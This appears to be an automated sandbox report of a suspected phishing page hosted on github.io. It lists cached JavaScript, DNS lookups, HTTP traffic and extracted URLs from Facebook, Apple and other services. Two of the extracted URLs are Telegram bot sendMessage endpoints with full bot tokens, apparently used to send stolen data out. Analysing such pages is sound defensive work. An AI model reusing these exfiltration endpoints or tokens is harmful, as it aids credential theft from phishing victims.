us.\",\"releaseDate\":\"2024-07-27\",\"releaseTimestamp\":\"2024-07-27T10:43:41Z\"},{\"versionDisplay\":\"3.8.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-04-24\",\"releaseTimestamp\":\"2024-04-24T06:53:47Z\"},{\"versionDisplay\":\"3.7.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-04-07\",\"releaseTimestamp\":\"2024-04-07T03:04:40Z\"},{\"versionDisplay\":\"3.6.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-03-22\",\"releaseTimestamp\":\"2024-03-22T04:00:14Z\"},{\"versionDisplay\":\"3.5.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-03-04\",\"releaseTimestamp\":\"2024-03-04T03:32:27Z\"},{\"versionDisplay\":\"3.4.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-02-02\",\"releaseTimestamp\":\"2024-02-02T02:14:57Z\"},{\"versionDisplay\":\"3.3.0\",\"releaseNotes\":\"We
    Source: chromecache_279.2.drString found in binary or memory: \\nhttps://www.capcut.net/clause/privacy?region=us\\n\\nContact Us\\nAny questions about CapCut? Please contact us at capcut.support@bytedance.com.\\nFacebook: https://www.facebook.com/capcutapp/\\nInstagram: https://www.instagram.com/capcutapp/\\nYouTube: https://www.youtube.com/c/capcutofficial\\nTikTok: https://www.tiktok.com/@capcut\"},\"isStandaloneWithCompanionForWatchOS\":false,\"isAppleWatchSupported\":false,\"requiredCapabilitiesForRealityDevice\":\"arm64 \",\"websiteUrl\":\"https://www.capcut.com\",\"versionHistory\":[{\"versionDisplay\":\"4.6.0\",\"releaseNotes\":\"- Added custom tracking for any area to camera tracking.\\n- Added new scenes to auto removal for improved portrait removal.\\n- Short text recommendations are now supported in AI writer for smart generation of narrations, editing, expanding, and summarizing.\\n- Layout presets and custom layouts are now supported in the editor window for improved editing efficiency.\\n- AI image inpaint is now supported with smart erase or content replacement.\",\"releaseDate\":\"2024-09-28\",\"releaseTimestamp\":\"2024-09-28T12:53:54Z\"},{\"versionDisplay\":\"4.1.0\",\"releaseNotes\":\"- Several preinstalled, realistic, AI-generated people with natural backgrounds have been added.\\n- Smart Split in the editor now supports deleting and moving split points.\\n- Clean up edge and Feather edge added to Chroma keying.\\n- Fixed some known issues - improved the editing experience.\\nThank you for choosing CapCut and creating even more beautiful moments with us.\",\"releaseDate\":\"2024-07-27\",\"releaseTimestamp\":\"2024-07-27T10:43:41Z\"},{\"versionDisplay\":\"3.8.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-04-24\",\"releaseTimestamp\":\"2024-04-24T06:53:47Z\"},{\"versionDisplay\":\"3.7.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-04-07\",\"releaseTimestamp\":\"2024-04-07T03:04:40Z\"},{\"versionDisplay\":\"3.6.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-03-22\",\"releaseTimestamp\":\"2024-03-22T04:00:14Z\"},{\"versionDisplay\":\"3.5.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-03-04\",\"releaseTimestamp\":\"2024-03-04T03:32:27Z\"},{\"versionDisplay\":\"3.4.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-02-02\",\"releaseTimestamp\":\"2024-02-02T02:14:57Z\"},{\"versionDisplay\":\"3.3.0\",\"releaseNotes\":\"We
    Source: chromecache_260.2.drString found in binary or memory: __d("AdsCanvasConstants",["AdsStrings","SearchableEntry"],(function(a,b,c,d,e,f,g){"use strict";a={CATALOG_MANAGER:"catalog_manager"};b=1e3;e=100;f="1128914607238107";var h="https://www.facebook.com/business/learn/facebook-create-ad-canvas-ads/",i="https://fb.com/canvas_doc/",j=1,k=1,l="https://fb.com/canvas_doc/",m="1454940661230823",n=20,o=["facebook/right_column","facebook/instant_article","facebook/instream_video","facebook/video_feeds"],p=["audience_network","messenger"],q="creative_section",r="canvas_section",s="page_section",t="existing_section";c=new(c("SearchableEntry"))({subtile:"",title:d("AdsStrings").MixedValuePlaceholder,uniqueID:0});d="_COPY";var u=["397246414010297","949746971832205","1867119523503927","625628120978122","1825832234305849","144440257763467"],v="Manually Added Products",w="133471657203838",x="1932289657009030",y="1063217037112304",z="424787857903852",A="1369752616394017",B="3946326578782885",C={133471657203838:"/images/ads/canvas/carousel_get_new_customers_template_preview.gif",1063217037112304:"/images/ads/canvas/carousel_showcase_your_business_template_preview.gif",424787857903852:"/images/ads/canvas/carousel_sell_product_manual_template_preview.gif",1309632222469576:"/images/ads/canvas/carousel_collect_contact_info.gif"},D={133471657203838:"/images/ads/canvas/collection_get_new_customers_template_preview.gif",1063217037112304:"/images/ads/canvas/collection_showcase_your_business_template_preview.gif",424787857903852:"/images/ads/canvas/collection_sell_product_manual_template_preview.gif",1932289657009030:"/images/ads/canvas/collection_sell_product_grid_template_preview.gif",1369752616394017:"/images/ads/canvas/collection_sell_product_lifestyle_template_preview.gif",3946326578782885:"/images/ads/canvas/collection_digital_circular_template_preview.gif"},E={133471657203838:"/images/ads/canvas/image_get_new_customers_template_preview.gif",1063217037112304:"/images/ads/canvas/image_showcase_your_business_template_preview.gif",424787857903852:"/images/ads/canvas/image_sell_product_manual_template_preview.gif",1309632222469576:"/images/ads/canvas/image_collect_contact_info.gif"};g.APP_REFERRER=a;g.ADS_CANVAS_LIBRARY_DOC_MAX=b;g.ADS_CANVAS_LIBRARY_PRELOAD_ITEMS_COUNT=e;g.ADS_COLLECTION_HELP_DOC_CMS_ID=f;g.CANVAS_LEARN_MORE_LINK=h;g.CANVAS_PREFIX=i;g.DEFAULT_PAGE_CANVAS_COUNT=j;g.DEFAULT_PAGE_PUBLISHED_CANVAS_COUNT=k;g.EMPTY_CANVAS_LINK=l;g.INLINE_TEMPLATE_HELPTRAY_CMS_ID=m;g.TYPE_AHEAD_LIMIT=n;g.UNSUPPORTED_PLACEMENT_GROUPS=o;g.UNSUPPORTED_PLACEMENT_PLATFORMS=p;g.CREATIVE_SECTION=q;g.CANVAS_SECTION=r;g.PAGE_SECTION=s;g.EXISTING_SECTION=t;g.MIXED_SEARCH_ENTRY=c;g.CANVAS_COPY_SUFFIX=d;g.INLINE_SOURCE_DOC_ID=u;g.MANUAL_CATALOG_NAME=v;g.GET_NEW_CUSTOMERS_TEMPLATE_ID=w;g.SELL_PRODUCTS_GRID_LAYOUT_TEMPLATE_ID=x;g.STORYTELLING_TEMPLATE_ID=y;g.SELL_PRODUCTS_MANUAL_TEMPLATE_ID=z;g.SELL_PRODUCTS_LIFESTYLE_TEMPLATE_ID=A;g.DIGITAL_CIRCULARS_TEMPLATE_ID=B;g.TEMPLATE_CAROUSEL_THUMBNAIL_GIF=C;g.TEMPLATE_COLLECTION_THUMBNAIL_GIF=D;g.TEM
    Source: chromecache_414.2.dr, chromecache_525.2.drString found in binary or memory: __d("AdsCertificationConstants",[],(function(a,b,c,d,e,f){"use strict";a="https://www.aclu.org";b="https://www.consumerfinance.gov/";c="https://civilrights.org";d="https://www.eeoc.gov";e="https://www.facebook.com/policies/ads/prohibited_content/discriminatory_practices";var g="https://www.hud.gov",h="https://www.justice.gov/crt",i="https://nationalfairhousing.org/";f.ACLU_LINK=a;f.CFPU_LINK=b;f.CIVIL_RIGHT_LINK=c;f.EEOC_LINK=d;f.FACEBOOK_POLICY_LINK=e;f.HUD_LINK=g;f.JUSTIC_LINK=h;f.NFHA_LINK=i}),66); equals www.facebook.com (Facebook)
    Source: chromecache_491.2.drString found in binary or memory: __d("Chromedome",["fbt"],(function(a,b,c,d,e,f,g,h){function i(){if(document.domain==null)return null;var a=document.domain,b=/^intern\./.test(a);if(b)return null;b=/(^|\.)facebook\.(com|sg)$/.test(a);if(b)return"facebook";b=/(^|\.)instagram\.com$/.test(a);if(b)return"instagram";b=/(^|\.)threads\.net$/.test(a);if(b)return"threads";b=/(^|\.)messenger\.com$/.test(a);return b?"messenger":null}function j(a){if(a==="instagram")return h._("This is a browser feature intended for developers. If someone told you to copy-paste something here to enable an Instagram feature or \"hack\" someone's account, it is a scam and will give them access to your Instagram account.");return a==="threads"?h._("This is a browser feature intended for developers. If someone told you to copy-paste something here to enable a Threads feature or \"hack\" someone's account, it is a scam and will give them access to your Threads account."):h._("This is a browser feature intended for developers. If someone told you to copy and paste something here to enable a Facebook feature or \"hack\" someone's account, it is a scam and will give them access to your Facebook account.")}function a(a){if(top!==window)return;a=i();if(a==null)return;var b=h._("Stop!");a=j(a);var c=h._("See {url} for more information.",[h._param("url","https://www.facebook.com/selfxss")]),d="font-family:helvetica; font-size:20px; ";[[b,d+"font-size:50px; font-weight:bold; color:red; -webkit-text-stroke:1px black;"],[a,d],[c,d],["",""]].map(function(a){window.setTimeout(console.log.bind(console,"\n%c"+a[0].toString(),a[1]))})}g.start=a}),226); equals www.facebook.com (Facebook)
    Source: chromecache_643.2.drString found in binary or memory: __d("StaticLinks.brands",[],(function(a,b,c,d,e,f){a=Object.freeze({FB_TERMS:"https://www.facebook.com/terms.php",ONLINE_INVOICING_TERMS:"https://www.facebook.com/terms_ads_invoicing.php",ONLINE_EC_GRAPH_API_TERMS:"https://www.facebook.com/ec_graph_api_terms.php",PAGES_TERMS:"https://www.facebook.com/page_guidelines.php",COMMUNITY_PAYMENT_TERMS:"https://www.facebook.com/payments_terms",IG_TERMS:"https://help.instagram.com/581066165581870",IG_DATA_POLICY:"https://help.instagram.com/519522125107875",IG_COOKIE_TERMS:"https://www.instagram.com/legal/cookies/",IG_PAGE_TERMS:"https://www.facebook.com/policies/pages_groups_events/",SELF_SERVE_ADS_TERMS:"https://www.facebook.com/legal/self_service_ads_terms",PRIVACY_POLICY:"https://facebook.com/privacy/policy"});f["default"]=a}),66); equals www.facebook.com (Facebook)
    Source: chromecache_452.2.drString found in binary or memory: return a=n===l.CARD_DISPLAY_STYLES.appOfTheDay?_:n===l.CARD_DISPLAY_STYLES.gameOfTheDay?P:n===l.CARD_DISPLAY_STYLES.inAppPurchase?k:this.getTitleKey(e),this.i18n.t(a,{appName:r,storyTitle:i,_disableSafeString:!0})}getOGType(){return i.default.meta.og.type.story}getTwitterSite(){return this.appViewState.isMacAppStoreView?this.i18n.t("WEA.EditorialItemProductPages.Twitter.site.macOs",{_disableSafeString:!0}):super.getTwitterSite(...arguments)}getTwitterTitle(){return this.getOGTitle(...arguments)}getSchemaTags(e){const{product:t}=e.viewModel,r=E(t),[i]=r,n=(0,l.hasShelfDisplay)(i,"collectionLockup"),{lastPublishedDate:a}=t,o={"@type":"Organization",name:"Apple Inc",url:"http://www.apple.com",logo:{"@type":"ImageObject",url:"https://www.apple.com/ac/structured-data/images/knowledge_graph_logo.png"}},s=this.getOGImageTags(e).find((e=>"og:image"===e.name))||{},p={"@context":"http://schema.org",name:this.getSeoTitle(e)??this.getTitle(e),description:this.getSeoDescription(e)??this.getDescription(e),image:s.content,author:o,publisher:o,headline:this.getOGTitle(e),dateModified:a,datePublished:a} equals www.twitter.com (Twitter)
    Source: chromecache_616.2.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(a){var b=new URL(a);b=b.hostname.endsWith(".facebook.com")&&b.pathname=="/signals/iwl.js";if(!b)throw new Error("Disallowed script URL");return a}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: chromecache_616.2.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: chromecache_616.2.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: chromecache_500.2.drString found in binary or memory: var YOb=function(a){return _.Ca(a===null?"null":a===void 0?"undefined":a)},ZOb=function(a){const b=new _.Yn(a);return b.V==="www.youtube.com"&&b.H==="/watch"?(a=_.lo(b,"v"),`https://www.youtube.com/embed/${encodeURIComponent(a)}`):a},$Ob=function(a,b){a.H.size===0&&a.N.addEventListener("message",d=>{if(/\.google\.com$/.test(d.origin)&&d.data){var e=a.H.get(d.data.type);e&&e.Ci().forEach(f=>{f.call(d)})}});var c=a.H.get("CLOSE_DIALOG");c?c.add(b):(c=new _.PL,c.add(b),a.H.set("CLOSE_DIALOG",c))},aPb= equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: sayidanur.github.io
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: static.xx.fbcdn.net
    Source: global trafficDNS traffic detected: DNS query: facebook.com
    Source: global trafficDNS traffic detected: DNS query: is1-ssl.mzstatic.com
    Source: global trafficDNS traffic detected: DNS query: is2-ssl.mzstatic.com
    Source: global trafficDNS traffic detected: DNS query: is5-ssl.mzstatic.com
    Source: global trafficDNS traffic detected: DNS query: is4-ssl.mzstatic.com
    Source: global trafficDNS traffic detected: DNS query: is3-ssl.mzstatic.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: global trafficDNS traffic detected: DNS query: play-lh.googleusercontent.com
    Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
    Source: unknownHTTP traffic detected: POST /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=1&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1Host: www.facebook.comConnection: keep-aliveContent-Length: 914sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5MFrhrt7S4CHurFAAccept: */*Origin: https://www.facebook.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.facebook.com/?locale=ru_RUAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; _js_datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: kIGair0/0fsdSwAW6pmtGn2MQtkfG6o6MmxW7aKkrjKHobkuP+x2XqeRYs/LqRytAcfHsNVIsYc5pWS8HjmcGg==Date: Sun, 29 Sep 2024 04:54:26 GMTTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: +grB58efBfa0XYEvgoDivPiWppVGHsfHTQInZX9pwgn7yVVAlyuNccAn7DkkF9bFeGiXoKVj98twSvZrEC7s+A==Date: Sun, 29 Sep 2024 04:54:49 GMTTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: /qqDsLmVklthgDuQv4qUVACqv1kjsxlgblzxUgdUk53pOTWqG1mfwD8ioypBmMb+D5jBd5YGIdd7MGZ0AoFcrw==Date: Sun, 29 Sep 2024 04:55:37 GMTTransfer-Encoding: chunked
    Source: chromecache_311.2.dr, chromecache_448.2.dr, chromecache_500.2.drString found in binary or memory: http://127.0.0.1:$
    Source: chromecache_390.2.dr, chromecache_397.2.drString found in binary or memory: http://git.io/yBU2rg
    Source: chromecache_279.2.drString found in binary or memory: http://help.instagram.com/
    Source: chromecache_279.2.drString found in binary or memory: http://instagram.com/
    Source: chromecache_279.2.drString found in binary or memory: http://instagram.com/legal/privacy/
    Source: chromecache_289.2.drString found in binary or memory: http://jedwatson.github.io/classnames
    Source: chromecache_452.2.drString found in binary or memory: http://reportaproblem.apple.com
    Source: chromecache_452.2.dr, chromecache_279.2.drString found in binary or memory: http://schema.org
    Source: chromecache_452.2.drString found in binary or memory: http://schema.org/ItemListOrderAscending
    Source: chromecache_279.2.drString found in binary or memory: http://vsco.co/about/privacy_policy
    Source: chromecache_279.2.drString found in binary or memory: http://vsco.co/about/terms_of_use
    Source: chromecache_279.2.drString found in binary or memory: http://vsco.co/vscocam
    Source: chromecache_311.2.dr, chromecache_642.2.dr, chromecache_500.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: chromecache_452.2.drString found in binary or memory: http://www.apple.com
    Source: chromecache_279.2.drString found in binary or memory: http://www.apple.com/uk/itunes/download/
    Source: chromecache_279.2.drString found in binary or memory: http://www.capcut.com/clause/terms-of-service
    Source: chromecache_279.2.drString found in binary or memory: http://www.snapchat.com
    Source: chromecache_279.2.drString found in binary or memory: https://about.instagram.com/safety
    Source: chromecache_279.2.drString found in binary or memory: https://amp-api-edge.apps.apple.com
    Source: chromecache_452.2.drString found in binary or memory: https://amp-api-search-edge.apps.apple.com/v1/catalog/$
    Source: chromecache_452.2.drString found in binary or memory: https://amp-api.books.apple.com/
    Source: chromecache_452.2.drString found in binary or memory: https://amp.apple.com
    Source: chromecache_452.2.drString found in binary or memory: https://api.books.apple.com/
    Source: chromecache_485.2.drString found in binary or memory: https://api.telegram.org/bot6681983180:AAFEgYgqQiWC4-0rAdlW7Vu_4RBUF_r6se4/sendMessage?chat_id=69772
    Source: chromecache_315.2.dr, chromecache_476.2.drString found in binary or memory: https://api.telegram.org/bot7363306617:AAHr68RFfPzZGKytCR0Lw_6V404fug3Ld68/sendMessage?chat_id=55938
    Source: chromecache_544.2.dr, chromecache_535.2.drString found in binary or memory: https://apis.google.com/js/api.js
    Source: chromecache_452.2.drString found in binary or memory: https://apps.apple.com
    Source: chromecache_452.2.dr, chromecache_279.2.drString found in binary or memory: https://apps.apple.com/
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/#organization
    Source: chromecache_452.2.drString found in binary or memory: https://apps.apple.com/$
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/assets/images/knowledge-graph/apps.png
    Source: chromecache_452.2.dr, chromecache_279.2.drString found in binary or memory: https://apps.apple.com/story/id1538632801
    Source: chromecache_452.2.drString found in binary or memory: https://apps.apple.com/story/id1539235847
    Source: chromecache_452.2.drString found in binary or memory: https://apps.apple.com/story/id1604959672
    Source: chromecache_452.2.drString found in binary or memory: https://apps.apple.com/us/app/apple-podcasts/id525463029
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/capcut-photo-video-editor/id1500855883
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/capcut-photo-video-editor/id1500855883&quot;
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/google-photos-backup-edit/id962194608
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/google-photos-backup-edit/id962194608&quot;
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/instagram/id389801252
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/meta-verified-standard/id389801252
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/photogrid-video-collage-maker/id543577420
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/photogrid-video-collage-maker/id543577420&quot;
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/picsart-photo-video-editor-ai/id587366035
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/picsart-photo-video-editor-ai/id587366035&quot;
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/snapchat-chat-with-friends/id447188370
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/snapchat-chat-with-friends/id447188370&quot;
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/threads/id6446901002
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/threads/id6446901002&quot;
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/youtube-watch-listen-stream/id544007664
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/app/youtube-watch-listen-stream/id544007664&quot;
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/charts/iphone/photo-video-apps/6008
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/charts/iphone/photo-video-apps/6008&quot;
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/charts/iphone/social-networking-apps/6005
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/developer/instagram-inc/id389801255
    Source: chromecache_279.2.drString found in binary or memory: https://apps.apple.com/uz/developer/instagram-inc/id389801255&quot;
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/38/7d/6c/387d6c85-7c78-ffab-d93
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/64/14/47/6414476d-f4db-9bb4-93d
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/6c/96/3e/6c963ee5-4628-1a7b-0fb
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/6d/09/1a/6d091aa9-8f9b-ceef-784
    Source: chromecache_279.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/7d/00/84/7d008488-5cbd-2a24-3f4
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/92/6e/dc/926edca5-b31b-a5ab-a27
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/af/15/b8/af15b8a4-f74c-005a-577
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/ca/6e/70/ca6e7071-fd4a-0ffb-021
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/d9/1a/28/d91a28c5-990f-9b2d-d65
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/14/d0/cf/14d0cf5e-72c7-1df3-011
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/1d/b1/35/1db13506-dfce-582e-6da
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/26/88/2d/26882db6-6bcb-c8a7-551
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/27/89/28/2789285f-d6b5-bc68-c40
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/36/6e/6d/366e6dd2-48bc-7183-b44
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/3d/aa/33/3daa3394-79fb-ec46-44b
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/4b/30/dd/4b30dd46-32ed-b621-bd1
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/7d/63/19/7d631997-4ce4-6ce9-914
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/82/e9/58/82e9586b-1983-5439-1cb
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/8f/cb/4e/8fcb4e35-30df-c295-bbd
    Source: chromecache_638.2.dr, chromecache_439.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/a0/6f/ba/a06fba65-f57a-cf31-312
    Source: chromecache_279.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/af/e7/92/afe79244-897a-982a-4b1
    Source: chromecache_551.2.drString found in binary or memory: https://buy.music.apple.com/account/v1/affiliation/association
    Source: chromecache_551.2.drString found in binary or memory: https://buy.tv.apple.com/account/v1/affiliation/association
    Source: chromecache_485.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css
    Source: chromecache_414.2.dr, chromecache_525.2.drString found in binary or memory: https://civilrights.org
    Source: chromecache_463.2.dr, chromecache_616.2.drString found in binary or memory: https://connect.facebook.net/
    Source: chromecache_632.2.dr, chromecache_282.2.dr, chromecache_446.2.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
    Source: chromecache_463.2.dr, chromecache_616.2.drString found in binary or memory: https://connect.facebook.net/log/fbevents_telemetry/
    Source: chromecache_390.2.dr, chromecache_397.2.drString found in binary or memory: https://deprecations.emberjs.com/v1.x/#toc_binding-style-attributes.
    Source: chromecache_318.2.dr, chromecache_496.2.drString found in binary or memory: https://fburl.com/dialog-provider).
    Source: chromecache_260.2.drString found in binary or memory: https://fburl.com/silvertail-theme
    Source: chromecache_434.2.drString found in binary or memory: https://fburl.com/wiki/e0vmgfv2
    Source: chromecache_459.2.drString found in binary or memory: https://fontawesome.com
    Source: chromecache_459.2.drString found in binary or memory: https://fontawesome.com/license/free
    Source: chromecache_551.2.drString found in binary or memory: https://git.io/fjule
    Source: chromecache_551.2.drString found in binary or memory: https://git.io/fxCyr
    Source: chromecache_279.2.drString found in binary or memory: https://help.instagram.com/581066165581870
    Source: chromecache_279.2.drString found in binary or memory: https://is1-ssl.mzstatic.com
    Source: chromecache_279.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features111/v4/59/af/9e/59af9e68-220c-50d1-fb85-734b137d1e8
    Source: chromecache_279.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features115/v4/d1/7a/86/d17a8639-c381-e3fd-8db6-ace1845212e
    Source: chromecache_279.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features116/v4/ec/8c/b5/ec8cb547-a88f-bd50-0bae-ecf33835cf8
    Source: chromecache_279.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features116/v4/fd/d3/28/fdd32829-7ea9-7aa9-111f-841ef171137
